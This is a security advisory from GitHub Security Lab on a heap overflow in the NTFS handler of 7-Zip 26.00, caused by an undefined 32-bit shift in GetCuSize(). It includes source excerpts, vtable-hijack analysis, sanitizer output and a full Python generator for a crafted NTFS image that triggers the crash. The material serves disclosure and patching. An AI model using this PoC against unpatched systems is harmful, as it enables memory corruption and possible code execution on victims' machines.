Coordinated Disclosure Timeline
- 2026-04-24: The report was delivered as a sourceforge private issue.
- 2026-04-27: v26.01 with a fix was released.
Summary
A heap buffer overflow vulnerability (GHSL-2026-140) exists in 7-Zip version 26.00, caused by an under-allocation in the NTFS compressed stream buffer (GetCuSize shift UB), potentially allowing attackers to exploit this issue for arbitrary code execution or application crashes.
Project
7-Zip
Tested Version
Details
Heap buffer overflow via NTFS compressed stream buffer under-allocation (GetCuSize shift UB) (GHSL-2026-140)
A heap buffer overflow vulnerability exists in the NTFS archive handler in 7-Zip that can lead to code execution via vtable hijack. The CInStream::GetCuSize() function computes the NTFS compression-unit buffer size using a 32-bit shift (UInt32)1 << (BlockSizeLog + CompressionUnit). When an attacker-crafted NTFS image sets ClusterSizeLog >= 28 (accepted by the parser) and a compressed data attribute with CompressionUnit == 4, the shift exponent reaches 32 — undefined behavior in C++. On both x86 and x64, the UB causes _inBuf to be allocated as 1 byte. The subsequent ReadStream_FALSE writes 256 MB of attacker-controlled data into this 1-byte buffer.
The NTFS boot sector parser accepts cluster sizes up to 2^30 bytes (CPP/7zip/Archive/NtfsHandler.cpp, line 133):
// NtfsHandler.cpp, lines 122-134
const unsigned v = p[13];
if (v <= 0x80)
{
const int t = GetLog(v);
if (t < 0) return false;
sectorsPerClusterLog = (unsigned)t;
}
else
sectorsPerClusterLog = 0x100 - v;
ClusterSizeLog = SectorSizeLog + sectorsPerClusterLog;
if (ClusterSizeLog > 30) // allows 28, 29, 30
return false;
Non-resident compressed data attributes carry CompressionUnit from the attacker-controlled attribute header (NtfsHandler.cpp:509). The value CompressionUnit == 4 is explicitly accepted (NtfsHandler.cpp:430).
The compressed stream’s buffer size is computed as:
// NtfsHandler.cpp, line 687
UInt32 GetCuSize() const { return (UInt32)1 << (BlockSizeLog + CompressionUnit); }
When BlockSizeLog == 28 and CompressionUnit == 4, the exponent is 32 — undefined behavior (shift by >= type width). On x86, (UInt32)1 << 32 typically yields 1 due to hardware masking of shift counts.
The undersized buffer is then used:
// NtfsHandler.cpp, lines 695-697
UInt32 cuSize = GetCuSize(); // UB → 1 byte on x86/x64
_inBuf.Alloc(cuSize); // allocates 1 byte
_outBuf.Alloc(kNumCacheChunks << _chunkSizeLog); // x86: 2 bytes; x64: 8 GB (succeeds on >= 16 GB RAM)
NTFS uses LZNT1 compression. The two buffers serve a standard decompress pipeline:
_inBuf— holds raw compressed data read from disk (viaReadStream_FALSE)_outBuf— holds decompressed output fromLznt1Dec(), also used as a read cache
The normal flow is: disk → _inBuf → Lznt1Dec() → _outBuf → memcpy to caller. Both buffers should be GetCuSize() bytes (one compression unit). Due to the shift UB, _inBuf gets 1 byte instead of the intended size, so the very first step — reading compressed data from disk into _inBuf — overflows:
// NtfsHandler.cpp, lines 940-941
const size_t compressed = (size_t)numChunks << BlockSizeLog; // up to 256 MB
RINOK(ReadStream_FALSE(Stream, _inBuf + offs, compressed)) // writes into 1-byte buffer
Note that the overflow target is _inBuf, not _outBuf. On x64, even when the 8 GB _outBuf allocation succeeds, the 1-byte _inBuf is still overflowed because both buffer sizes are computed independently from the same UB shift result.
Platform-dependent behavior
On 32-bit builds, (size_t)2 << 32 is also UB (size_t is 32-bit), yielding 2 via hardware masking. Both _inBuf.Alloc(1) and _outBuf.Alloc(2) succeed with tiny allocations, and the heap overflow is unconditionally reached.
On 64-bit builds, (size_t)2 << 32 is a valid 64-bit shift yielding 8,589,934,592 (8 GB). The _outBuf.Alloc(8 GB) call succeeds on systems with sufficient RAM (confirmed on a 64 GB machine). After the allocation succeeds, execution proceeds to ReadStream_FALSE and the same heap overflow occurs. On low-memory systems, the allocation may fail with CNewException, limiting the impact to DoS.
Impact
- Heap buffer overflow leading to vtable hijack (potential code execution) — 256 MB written into a 1-byte heap buffer.
ReadStream_FALSEcallsstream->Read()in a loop (64 KB per iteration viakBlockSize). Debugger analysis on a release /O1 build (identical codegen to official binary) shows the stream object (CInStream) is allocated only 304 bytes (0x130) after_inBufon the heap. The firstRead()iteration writes 64 KB of attacker-controlled data starting at_inBuf, overwriting the stream object’s vtable pointer after just 304 bytes. The secondRead()iteration dispatches through the corrupted vtable — a classic vtable hijack. The attacker controls the written data (NTFS cluster content from the crafted image), so they control the overwritten vtable pointer. - Both x86 and x64 builds are affected. On x64, the overflow is reached on any system where the 8 GB
_outBufallocation succeeds (common on modern systems with >= 16 GB RAM). - On Windows,
ReadFilefails if it detects an unmapped or guard page in the destination range before copying the controlled bytes. Attackers may need Heap Feng Shui to place_inBufso the overwrite reaches adjacent objects without immediately faulting. - The NTFS handler is enabled in stock
7z.dlland is registered for.ntfsand.imgextensions. However, 7-Zip uses signature-based fallback detection: when the format matching the file extension fails to open, all remaining handlers are tried in signature-priority order. Because the NTFS handler matches on the"NTFS "signature at byte offset 3 (REGISTER_ARC_IinNtfsHandler.cpp:2889), a crafted NTFS image with any file extension — including.7z,.zip,.rar, or no extension at all — will be opened by the NTFS handler after the extension-matched handler rejects it. This means the attack surface is not limited to files with NTFS-associated extensions. - Triggers during extraction/testing of a compressed file from the crafted image.
- No user interaction beyond opening the crafted image.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.8 (High)
Affected versions: The GetCuSize() computation has been present since NTFS compressed stream support was introduced. All versions through 26.00 are affected.
CWEs
- CWE-787: “Out-of-bounds Write”
- CWE-190: “Integer Overflow or Wraparound”
Resources
PoC generator (gen_ntfs_sparse.py) — generates poc_ntfs_sparse.ntfs (512 MB sparse NTFS image, ~8 KB actual data):
#!/usr/bin/env python3
"""Generate a sparse NTFS image with ClusterSizeLog=28 and a compressed
$DATA attribute with CompressionUnit=4 to trigger GetCuSize() UB."""
import struct, os, sys
boot = bytearray(512)
boot[0:3] = b'\xEB\x52\x90'
boot[3:11] = b'NTFS '
struct.pack_into('<H', boot, 11, 512)
boot[13] = 0xED # ClusterSizeLog = 28
for i in range(14, 21): boot[i] = 0
boot[21] = 0xF8
struct.pack_into('<H', boot, 24, 63)
struct.pack_into('<H', boot, 26, 255)
struct.pack_into('<Q', boot, 40, 2 << 19) # TotalSectors
struct.pack_into('<Q', boot, 48, 1) # MftCluster=1 -> offset 256MB
boot[64] = 0xF6
boot[68] = 0xF6
struct.pack_into('<Q', boot, 72, 0x1234567890ABCDEF)
boot[510] = 0x55; boot[511] = 0xAA
MFT_REC = 1024
def mft_rec(seq, flags, attrs, rec_num=0):
r = bytearray(MFT_REC)
r[0:4] = b'FILE'
struct.pack_into('<H', r, 4, 0x30) # UpdateSequenceOffset
struct.pack_into('<H', r, 6, 3) # UpdateSequenceSize
struct.pack_into('<Q', r, 8, 0)
struct.pack_into('<H', r, 16, seq)
struct.pack_into('<H', r, 18, 1)
struct.pack_into('<H', r, 20, 0x38)
struct.pack_into('<H', r, 22, flags)
bytes_in_use = (0x38 + len(attrs) + 8 + 7) & ~7
struct.pack_into('<I', r, 24, bytes_in_use)
struct.pack_into('<I', r, 28, MFT_REC)
struct.pack_into('<I', r, 0x2C, rec_num)
r[0x38:0x38+len(attrs)] = attrs
struct.pack_into('<I', r, 0x38+len(attrs), 0xFFFFFFFF)
usn = 0x0001
struct.pack_into('<H', r, 0x30, usn)
orig0 = struct.unpack_from('<H', r, 510)[0]
orig1 = struct.unpack_from('<H', r, 1022)[0]
struct.pack_into('<H', r, 0x32, orig0)
struct.pack_into('<H', r, 0x34, orig1)
struct.pack_into('<H', r, 510, usn)
struct.pack_into('<H', r, 1022, usn)
return r
def std_info():
d = bytearray(48)
a = bytearray(24 + len(d))
struct.pack_into('<I', a, 0, 0x10)
struct.pack_into('<I', a, 4, len(a))
a[8] = 0
struct.pack_into('<H', a, 14, 0x18)
struct.pack_into('<I', a, 16, len(d))
a[24:24+len(d)] = d
return a
def filename(name):
nu = name.encode('utf-16-le')
fn = bytearray(66 + len(nu))
struct.pack_into('<Q', fn, 0, 5)
fn[64] = len(name)
fn[65] = 3
fn[66:66+len(nu)] = nu
raw_len = 24 + len(fn)
padded_len = (raw_len + 7) & ~7
a = bytearray(padded_len)
struct.pack_into('<I', a, 0, 0x30)
struct.pack_into('<I', a, 4, padded_len)
a[8] = 0
struct.pack_into('<H', a, 14, 0x18)
struct.pack_into('<I', a, 16, len(fn))
a[24:24+len(fn)] = fn
return a
def compressed_data():
rl = bytes([0x11, 0x01, 0x01, 0x00]) # 1 cluster at LCN 1
hdr_size = 0x48
sz = (hdr_size + len(rl) + 7) & ~7
a = bytearray(sz)
struct.pack_into('<I', a, 0, 0x80)
struct.pack_into('<I', a, 4, sz)
a[8] = 1
struct.pack_into('<Q', a, 0x10, 0) # LowVcn
struct.pack_into('<Q', a, 0x18, 0) # HighVcn
struct.pack_into('<H', a, 0x20, hdr_size) # RunlistOffset
a[0x22] = 4 # CompressionUnit = 4
cs = 1 << 28
struct.pack_into('<Q', a, 0x28, cs) # AllocatedSize
struct.pack_into('<Q', a, 0x30, 100) # Size
struct.pack_into('<Q', a, 0x38, 100) # InitializedSize
struct.pack_into('<Q', a, 0x40, cs) # PackSize
a[hdr_size:hdr_size+len(rl)] = rl
return a
def mft_data_attr(num_records):
rl = bytes([0x11, 0x01, 0x01, 0x00])
sz = (72 + len(rl) + 7) & ~7
a = bytearray(sz)
struct.pack_into('<I', a, 0, 0x80)
struct.pack_into('<I', a, 4, sz)
a[8] = 1
struct.pack_into('<Q', a, 16, 0)
struct.pack_into('<Q', a, 24, 0)
struct.pack_into('<H', a, 32, 0x40)
struct.pack_into('<H', a, 34, 0) # CompressionUnit = 0
data_size = num_records * MFT_REC
struct.pack_into('<Q', a, 40, 1 << 28)
struct.pack_into('<Q', a, 48, data_size)
struct.pack_into('<Q', a, 56, data_size)
a[0x40:0x40+len(rl)] = rl
return a
num_mft_records = 7
mft = mft_rec(1, 1, std_info() + mft_data_attr(num_mft_records), rec_num=0)
for i in range(1, 5):
mft += mft_rec(i+1, 1, std_info(), rec_num=i)
mft += mft_rec(1, 3, std_info(), rec_num=5) # root dir
mft += mft_rec(1, 1, std_info() + filename("test.txt") + compressed_data(), rec_num=6)
mft_off = 1 << 28 # 256 MB
phy_size = 2 << 28 # 512 MB
out = sys.argv[1] if len(sys.argv) > 1 else "poc_ntfs_sparse.ntfs"
with open(out, 'wb') as f:
f.write(boot)
f.seek(mft_off)
f.write(mft)
f.seek(phy_size - 1)
f.write(b'\x00')
print(f"Generated: {out} ({os.stat(out).st_size} bytes apparent)")
Usage: python3 gen_ntfs_sparse.py [output_path]
The PoC constructs a hand-crafted NTFS image with ClusterSizeLog = 28 (256 MB clusters), 7 MFT records at offset 256 MB, and a compressed $DATA attribute with CompressionUnit = 4. No existing NTFS formatting tool (mkntfs) supports clusters larger than 64 KB, so the entire MFT structure is synthesized from scratch with correct:
- Boot sector with
SectorsPerCluster = 0xED(negative encoding forClusterSizeLog = 28) - USN fixup arrays at sector boundaries
- 8-byte-aligned attribute records (
$STANDARD_INFORMATION,$FILE_NAME,$DATA) - Non-resident
$DATArunlists withinNumClustersbounds - Compressed attribute header with
PackSizefield at offset0x40
Verification
Confirmed with UBSan.
UBSan (clang, Linux x64, recovery mode)
Confirms the root-cause shift UB regardless of platform:
../../Archive/NtfsHandler.cpp:687:47: runtime error: shift exponent 32 is too large
for 32-bit type 'UInt32' (aka 'unsigned int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
../../Archive/NtfsHandler.cpp:687:47
After the UB, cascading corruption leads to a SEGV:
../../Common/StreamUtils.cpp:62:27: runtime error: member call on address 0x5d3dd8f776f0
which does not point to an object of type 'ISequentialInStream'
note: object has invalid vptr
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==60==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000018
==60==Hint: address points to the zero page.
CVE
- CVE-2026-48095
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2026-140 in any communication regarding this issue.